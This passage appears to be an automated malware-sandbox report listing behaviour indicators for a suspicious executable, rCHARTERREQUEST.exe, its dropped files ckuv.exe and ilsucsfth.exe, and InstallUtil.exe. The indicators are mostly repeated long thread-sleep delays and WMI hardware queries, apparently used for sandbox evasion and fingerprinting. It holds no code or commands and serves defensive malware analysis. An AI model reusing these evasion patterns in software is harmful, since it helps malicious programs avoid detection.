                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99766s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7880Thread sleep count: 4402 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99591s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99459s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7872Thread sleep count: 5420 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -198656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99107s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98890s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -197562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98672s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -196686s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98234s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98124s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98005s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97889s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97781s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97669s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97452s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97344s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97223s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99968s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99858s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99746s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99564s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99218s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98999s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98671s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98452s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98233s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -98015s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97906s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97796s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97687s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97578s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97468s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97343s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -97157s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -96740s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -96624s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99891s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -99782s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7996Thread sleep count: 1591 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7996Thread sleep count: 1606 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99669s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99387s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99278s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -99140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98955s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98828s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98719s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98609s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98500s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98390s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98281s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98172s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7992Thread sleep time: -98062s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8188Thread sleep count: 3563 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8188Thread sleep count: 6200 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99891s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99672s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99344s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99231s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -99016s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98891s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98762s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98417s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98312s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -98094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97969s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97859s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97750s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97640s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97531s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97422s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97312s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -97093s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96984s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96437s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96315s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96187s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -96078s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95940s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95816s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95687s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95453s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95344s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95234s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95125s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -95015s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94906s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94797s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94687s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94578s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94464s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94359s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94243s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exe TID: 8160Thread sleep time: -94140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7380Thread sleep count: 2311 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7380Thread sleep count: 1072 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99766s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99657s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99532s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99407s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99282s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99172s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -99059s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98938s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98813s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98688s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98563s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98454s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98329s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98215s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -98094s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99766Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99547Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99219Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 99094Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98984Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98874Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98765Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98633Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98516Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98391Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98251Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 98125Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97970Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97813Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97688Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97563Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97453Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97344Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97219Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 97110Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96985Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96860Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96735Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96610Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96485Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96360Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96234Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96125Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 96016Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95906Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95797Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95688Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95563Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95453Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95344Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95219Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 95103Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94985Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94855Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94750Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94641Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94531Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94422Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 94312Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99766Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99591Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99459Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99219Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99107Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98890Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98672Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98562Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98453Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98343Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98234Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98124Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98005Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97889Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97781Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97669Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97562Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97452Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97344Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97223Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99968Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99858Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99746Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99564Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98452Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98233Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 98015Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97906Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97796Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97687Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97578Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97468Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97343Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 97157Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 96740Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 96624Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 99891Jump to behavior
